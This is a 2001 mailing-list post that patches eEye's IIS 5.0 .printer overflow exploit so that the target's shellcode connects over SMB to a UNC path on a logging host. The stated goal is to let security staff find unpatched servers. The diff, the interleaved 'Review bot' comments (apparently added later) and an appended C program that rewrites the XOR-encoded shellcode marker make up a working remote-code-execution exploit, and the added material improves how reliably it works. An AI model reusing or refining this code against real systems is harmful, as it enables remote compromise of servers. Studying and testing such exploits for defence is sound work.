Re: Windows 2000 .printer remote overflow proof of concept exploit

From: Matt Power (mhpowerat_private)
Date: Wed May 02 2001 - 21:28:58 PDT


    >        ... , will create a file called www.eEye.com.txt on the root of
    >drive c.
    >                 ... This proof of concept exploit is not to be used as a
    >method of testing to see if you're vulnerable or not.
    
    In some environments, security staff may be responsible for
    identifying which IIS 5.0 servers, out of a large collection of them,
    still do not have a fix in place for this vulnerability. The security
    staff may not have any convenient way to check for the existence of
    c:\www.eEye.com.txt on every server, and thus a proof-of-concept
    exploit that provides a result observable over the network may be of
    interest. One possibility, which involves only minor changes to the
    code provided by eEye Digital Security, is to try to get the IIS 5.0
    system to access a UNC share on a system controlled by the security
    staff. I've appended a patch to iishack2000.c that implements this.
    
    To use this, first obtain the original iishack2000.c from
    
      http://www.eeye.com/html/research/Advisories/iishack2000.c
    
    The MD5 checksum of this is 1e8f76209ee0afaa7b6625a8ace48535. Then,
    remove the control-M characters, e.g.,
    
      tr -d '\015' < iishack2000.c > iishack2000.c.tr; mv iishack2000.c.tr iishack2000.c
    
    The MD5 checksum should then be c93b4d9040723fb03c6860a023f6df2b, and
    the patch below can then be applied.
    
    Example: the security staff operate a machine 10.0.0.1 that has some
    way of logging any packets sent to it on tcp ports 139 and 445
    (ipchains, IP Filter, etc.), and which normally sees no traffic on
    those ports. The machine 10.0.0.2 is one of a large number of IIS 5.0
    servers that might still have the MS01-023 vulnerability. The setup of
    10.0.0.2 allows it to send SMB requests to 10.0.0.1, even though it
    normally would not do so. The security staff run this program, e.g.,
    
      % iishack2000 10.0.0.2 80 0 10.0.0.1
      % iishack2000 10.0.0.2 80 1 10.0.0.1
    
    and then look at the packet log files. If there are packets from
    10.0.0.2 to 10.0.0.1 on tcp ports 139 or 445, then 10.0.0.2 is almost
    certainly vulnerable. Otherwise, no evidence of a vulnerability has
    been found.
    
    Presumably more efficient methods will become available later, but
    this one may be of interest since many organizations need to check
    their IIS 5.0 servers now.
    
    (Incidentally, I've tried the webexplt.pl recently posted by Wanderley
    J. Abreu Jr., and for me it reports "The Machine tested has the IPP
    Vulnerability!" on machines that have Microsoft's Q296576 patch.)
    
    Matt Power
    BindView Corporation, RAZOR Team
    mhpowerat_private
    
    
    *** iishack2000.c.old	Wed May  2 23:58:17 2001
    --- iishack2000.c	Wed May  2 23:58:17 2001
    ***************
    *** 86,89 ****
      {
    ! 	char request_message[500];
    ! 	int X,sock,sp=0;
      	unsigned short serverport=htons(80);
    --- 86,89 ----
      {
    ! 	char ip[16],request_message[500],unc[20];
    ! 	int X,i,len,sock,sp=0;
      	unsigned short serverport=htons(80);
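Review bot: unc[20] is sized exactly for the worst case the later length check allows (two leading backslashes, a 15-character address, one separating backslash, one 'A', and the NUL), so a comment tying the 20 to the 15-character limit would stop a future edit from raising ip[16] without also growing unc[].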
    ***************
    *** 101,103 ****
      	printf("Exploit by Ryan Permeh <ryanat_private>\n");
    ! 	if(argc < 4) usage();
      	if(argv[1] != NULL)
    --- 101,103 ----
      	printf("Exploit by Ryan Permeh <ryanat_private>\n");
    ! 	if(argc < 5) usage();
      	if(argv[1] != NULL)
    ***************
    *** 116,118 ****
      	}	
    ! 	printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),htons(serverport));
      	memset(request_message,0x00,500);
    --- 116,142 ----
      	}	
    ! 	if(argv[4] != NULL && strlen(argv[4]) <= 15)
    ! 	{
    ! 		strcpy(ip, argv[4]);
    ! 		strcpy(&unc[2], argv[4]);
    ! 		len = strlen(argv[4]);
    ! 	}
    ! 	else
    ! 	{
    ! 		strcpy(ip, "127.0.0.1");
    ! 		strcpy(&unc[2], "127.0.0.1");
    ! 		len = strlen("127.0.0.1");
    ! 	}
    ! 	unc[0] = '\\';
    ! 	unc[1] = '\\';
    ! 	unc[len + 2] = '\\';
    ! 	for (i = 0; i < 16 - len; ++i)
    ! 	{
    ! 		unc[len + 3 + i] = 'A';
    ! 	}
    ! 	unc[19] = '\0';
    ! 	for (i = 146; i <= 164; ++i)
    ! 	{
    ! 		sc[sp][i] = unc[i - 146] ^ 3;
    ! 	}
    ! 	printf("Sending string to overflow sp %d for host: %s on port:%d and contact %s\n",sp,inet_ntoa(attack),htons(serverport),ip);
      	memset(request_message,0x00,500);
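Review bot: the else branch (strcpy(ip, "127.0.0.1") ...) silently turns a log host longer than 15 characters, such as a hostname, into a loopback target, which defeats the test: the IIS box would open the SMB connection to itself, the logging host sees nothing, and the operator concludes "no evidence of a vulnerability". Reject an over-long argv[4] with usage() instead of substituting a default; with the argc < 5 guard in place the argv[4] != NULL test is already redundant. Also worth a comment at the copy loop `for (i = 146; i <= 164; ++i)`: the marker must be exactly 19 bytes because it overwrites a fixed slot at the same offsets in both sc[0] and sc[1], the `^ 3` must match the key the existing decoder stub uses, and `unc[19] = '\0'` is deliberately never copied into the shellcode.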
    ***************
    *** 128,131 ****
      		send(sock,request_message,strlen(request_message)*sizeof(char),0);
    ! 		printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack));
    ! 		printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0);		
      	}
    --- 152,155 ----
      		send(sock,request_message,strlen(request_message)*sizeof(char),0);
    ! 		printf("Sent overflow, now look at logs on %s for SMB packets from %s\n",ip,inet_ntoa(attack));
    ! 		printf("If no packets were logged, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0);		
      	}
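Review bot: the new message could tell the operator what to look for in the logs, i.e. connections from the target to the log host on tcp ports 139 or 445 as the cover note says, rather than just "SMB packets"; the retry hint on the next line already covers the other service-pack variant.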
    ***************
    *** 144,148 ****
      {
    ! 	printf("Syntax:	 iishack2000 <hostname> <server port> <service pack>\n");
    ! 	printf("Example: iishack2000 127.0.0.1 80 0\n");
    ! 	printf("Example: iishack2000 127.0.0.1 80 1\n");	
      	exit(1);
    --- 168,172 ----
      {
    ! 	printf("Syntax:	 iishack2000 <hostname> <server port> <service pack> <log host>\n");
    ! 	printf("Example: iishack2000 127.0.0.1 80 0 10.0.0.1\n");
    ! 	printf("Example: iishack2000 127.0.0.1 80 1 10.0.0.1\n");	
      	exit(1);
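Review bot: the usage text does not state the constraint the code enforces on the new argument: <log host> must be a dotted-quad IP address of at most 15 characters, not a hostname. Adding a line such as `printf("<log host> must be an IP address, e.g. 10.0.0.1\n");` would save a confused run.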
    
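As an added illustration (this is not code from eEye's iishack2000.c or from the patch above), the following C program rebuilds the marker-substitution step the patch performs in a form that can be checked on its own: the 19-byte filename slot in the XOR-encoded payload is overwritten with a \\<ip>\<padding> UNC path of exactly the same length, so the payload's file-create call reaches out over SMB to the log host instead of writing c:\www.eEye.com.txt. The slot offset (146), the key (3) and the 19-byte length are taken from the patch; the payload buffer here is a constructed stand-in, and the assumption that the slot originally holds the filename encoded with the same key is mine. Unlike the patch, an unusable log host (hostname, over-long text) is refused rather than replaced with 127.0.0.1.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Added example, not from the original post or from eEye's code.
 * Offsets, key and slot length follow the patch to iishack2000.c;
 * the payload buffer in main() is a constructed stand-in. */

#define SLOT_LEN   19   /* strlen("c:\\www.eEye.com.txt") */
#define MAX_IP_LEN 15   /* "255.255.255.255" */
#define XOR_KEY    3    /* key used by the patch's copy loop */
#define SLOT_OFF   146  /* first byte of the filename slot (assumed) */

/* Accept only dotted-quad text of at most MAX_IP_LEN characters.
 * A hostname is refused here; the patch would silently fall back to
 * 127.0.0.1, which makes the target contact itself and logs nothing. */
static int is_dotted_quad(const char *s)
{
    int dots = 0, digits = 0;
    if (s == NULL || strlen(s) > MAX_IP_LEN) return 0;
    for (; *s; ++s) {
        if (*s == '.') { if (digits == 0) return 0; dots++; digits = 0; }
        else if (*s >= '0' && *s <= '9') { if (++digits > 3) return 0; }
        else return 0;
    }
    return dots == 3 && digits > 0;
}

/* Build "\\ip\AAAA..." padded to exactly SLOT_LEN bytes. No NUL is
 * written into the slot, matching the patch's 146..164 copy loop.
 * Returns 0 on success, -1 if ip is not usable. */
int build_unc_marker(const char *ip, char out[SLOT_LEN])
{
    size_t len, i;
    if (!is_dotted_quad(ip)) return -1;
    len = strlen(ip);
    out[0] = '\\';
    out[1] = '\\';
    memcpy(&out[2], ip, len);
    out[len + 2] = '\\';
    for (i = len + 3; i < SLOT_LEN; ++i) out[i] = 'A';   /* share name */
    return 0;
}

/* Overwrite the encoded slot sc[off .. off+SLOT_LEN) with the XORed
 * marker; refuses to write past the end of the buffer. */
int patch_marker(unsigned char *sc, size_t sc_len, size_t off, const char *ip)
{
    char unc[SLOT_LEN];
    size_t i;
    if (off + SLOT_LEN > sc_len) return -1;
    if (build_unc_marker(ip, unc) != 0) return -1;
    for (i = 0; i < SLOT_LEN; ++i)
        sc[off + i] = (unsigned char)unc[i] ^ XOR_KEY;
    return 0;
}

/* Decode the slot back to the plaintext the payload's decoder would
 * hand to its file-create call. out must hold SLOT_LEN + 1 bytes. */
void decode_marker(const unsigned char *sc, size_t off, char out[SLOT_LEN + 1])
{
    size_t i;
    for (i = 0; i < SLOT_LEN; ++i) out[i] = (char)(sc[off + i] ^ XOR_KEY);
    out[SLOT_LEN] = '\0';
}

int main(int argc, char **argv)
{
    /* Constructed stand-in for sc[sp]: encoded filler with the original
     * filename encoded at SLOT_OFF, as assumed for iishack2000.c. */
    static const char orig_name[] = "c:\\www.eEye.com.txt";
    unsigned char sc[200];
    char plain[SLOT_LEN + 1];
    const char *ip = argc > 1 ? argv[1] : "10.0.0.1";
    size_t i;

    for (i = 0; i < sizeof sc; ++i) sc[i] = 0x90 ^ XOR_KEY;
    for (i = 0; i < SLOT_LEN; ++i) sc[SLOT_OFF + i] = (unsigned char)orig_name[i] ^ XOR_KEY;

    decode_marker(sc, SLOT_OFF, plain);
    printf("before: %s\n", plain);
    if (patch_marker(sc, sizeof sc, SLOT_OFF, ip) != 0) {
        fprintf(stderr, "log host must be a dotted-quad IP of at most %d characters\n", MAX_IP_LEN);
        return 1;
    }
    decode_marker(sc, SLOT_OFF, plain);
    printf("after:  %s (%zu bytes)\n", plain, strlen(plain));
    return 0;
}
```

Run it with the log host as the only argument (e.g. `./marker 10.0.0.1`); the decoded "after" line is the path the patched payload would open, and a hostname argument exits non-zero instead of quietly targeting loopback.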



    This archive was generated by hypermail 2b30 : Wed May 02 2001 - 22:56:55 PDT